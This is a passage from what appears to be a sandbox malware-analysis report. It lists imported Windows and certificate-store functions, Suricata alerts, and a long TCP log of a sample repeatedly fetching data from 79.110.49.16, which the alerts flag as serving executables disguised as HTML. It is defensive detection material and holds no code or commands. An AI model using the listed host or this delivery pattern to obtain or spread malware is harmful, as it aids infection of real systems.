GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T06:22:54.893868+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49745	TCP
2024-10-02T06:22:56.106998+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49748	TCP
2024-10-02T06:23:00.097931+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49756	TCP
2024-10-02T06:23:01.191723+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49757	TCP
2024-10-02T06:23:02.538485+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49759	TCP
2024-10-02T06:23:03.666187+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49760	TCP
2024-10-02T06:23:05.921725+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49762	TCP
2024-10-02T06:23:07.365354+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.4	49763	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:22:48.386112928 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:48.386148930 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:48.386225939 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:48.618005037 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:48.618037939 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.267482042 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.267610073 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:49.289851904 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:49.289895058 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.290152073 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.333018064 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:49.707890034 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:49.755398035 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950289011 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950315952 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950323105 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950333118 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950365067 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950438976 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:49.950457096 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:49.950468063 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:49.950541019 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.040257931 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.040293932 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.040457010 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.040457010 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.040488958 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.040566921 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.041915894 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.041940928 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.041989088 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.042002916 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.042090893 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.042090893 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.130959034 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.130990028 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.131042957 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.131062031 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.131078005 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.131182909 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.132085085 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.132110119 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.132138968 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.132143974 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.132175922 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.132184029 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.132989883 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.133006096 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.133059025 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.133064985 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.133085966 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.133168936 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.133955956 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.133970976 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.134032965 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.134037971 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.134069920 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.134069920 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.134669065 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.134727001 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.134732962 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.134742975 CEST	443	49731	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.134820938 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.138648987 CEST	49731	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.556835890 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.556899071 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:50.556977987 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.557209015 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:50.557221889 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.178188086 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.181008101 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:51.181046963 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.440949917 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.440979004 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.440993071 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.441123009 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:51.441155910 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.441209078 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:51.441626072 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.441694021 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:51.441701889 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.441721916 CEST	443	49735	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:51.441739082 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:51.441768885 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:51.442203045 CEST	49735	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:53.805890083 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:53.805943966 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:53.806014061 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:53.806214094 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:53.806224108 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.445029974 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.478801012 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.478842020 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.717434883 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.717457056 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.717489958 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.717505932 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.717521906 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.717545986 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.717571020 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.717592001 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.803803921 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.803828955 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.803936005 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.803961039 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.804001093 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.805219889 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.805236101 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.805330992 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.805335045 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.805387974 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.893908978 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.893932104 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.894136906 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.894164085 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.894211054 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.895095110 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.895113945 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.895190954 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.895200968 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.895236969 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.896120071 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.896176100 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.896198988 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.896212101 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.896236897 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.896239996 CEST	443	49745	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.896255970 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.896284103 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.912853003 CEST	49745	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.990089893 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.990185022 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:54.990287066 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.993993998 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:54.994040966 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.632801056 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.634033918 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:55.634062052 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.904881001 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.904908895 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.904923916 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.904975891 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:55.905000925 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:55.905050993 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.017534018 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.017563105 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.017620087 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.017644882 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.017658949 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.017680883 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.019207001 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.019229889 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.019268036 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.019273043 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.019313097 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.107064962 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.107116938 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.107145071 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.107155085 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.107178926 CEST	443	49748	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.107187033 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.107270956 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.107594013 CEST	49748	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.121015072 CEST	49751	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.121042013 CEST	443	49751	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.121112108 CEST	49751	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.121368885 CEST	49751	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.121387005 CEST	443	49751	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.748934031 CEST	443	49751	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:56.750188112 CEST	49751	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:56.750212908 CEST	443	49751	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.007250071 CEST	443	49751	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.007333994 CEST	443	49751	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.008013010 CEST	49751	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:57.008284092 CEST	49751	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:57.012628078 CEST	49752	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:57.012670994 CEST	443	49752	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.012828112 CEST	49752	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:57.013060093 CEST	49752	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:57.013071060 CEST	443	49752	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.637806892 CEST	443	49752	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.638999939 CEST	49752	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:57.639049053 CEST	443	49752	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.896107912 CEST	443	49752	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.896188021 CEST	443	49752	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:57.896239996 CEST	49752	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:58.014892101 CEST	49752	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:58.063668966 CEST	49754	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:58.063719988 CEST	443	49754	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:58.063792944 CEST	49754	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:58.066804886 CEST	49754	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:58.066814899 CEST	443	49754	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:58.722332954 CEST	443	49754	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:58.728657007 CEST	49754	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:58.728686094 CEST	443	49754	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.012248039 CEST	443	49754	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.012342930 CEST	443	49754	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.012434959 CEST	49754	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.013405085 CEST	49754	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.018110991 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.018157959 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.018228054 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.018496037 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.018512964 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.653592110 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.657532930 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.657553911 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.917768002 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.917792082 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.917808056 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.917850018 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.917880058 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:22:59.917896986 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:22:59.917926073 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.008435965 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.008465052 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.008594990 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.008616924 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.008661985 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.009279966 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.009296894 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.009346008 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.009354115 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.009380102 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.009402037 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.097968102 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.097997904 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.098084927 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.098103046 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.098134995 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.098150969 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.098992109 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.099009991 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.099062920 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.099069118 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.099102020 CEST	443	49756	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.099111080 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.099131107 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.099159956 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.099412918 CEST	49756	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.108537912 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.108633995 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.108726025 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.108930111 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.108963966 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.742773056 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:00.786319971 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.823209047 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:00.823252916 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007610083 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007668018 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007689953 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007730961 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007764101 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007877111 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.007878065 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.007905006 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.007949114 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.095206976 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.095261097 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.095341921 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.095424891 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.095467091 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.095491886 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.096677065 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.096716881 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.096750021 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.096764088 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.096790075 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.096811056 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.191834927 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.191884041 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.191917896 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.191935062 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.191956997 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.191973925 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.193015099 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.193056107 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.193078041 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.193103075 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.193110943 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.193135977 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.194097042 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.194135904 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.194164038 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.194169044 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.194205046 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.257688046 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.257735968 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.257771969 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.257787943 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.257803917 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.257818937 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.280148029 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.280195951 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.280227900 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.280244112 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.280255079 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.280277967 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.281086922 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.281182051 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.281196117 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.281202078 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.281227112 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.281245947 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.281996012 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.282037973 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.282049894 CEST	49757	443	192.168.2.4	79.110.49.16
Oct 2, 2024 06:23:01.282056093 CEST	443	49757	79.110.49.16	192.168.2.4
Oct 2, 2024 06:23:01.282088041 CEST	49757	443	192.168.2.4	79.110.49.16
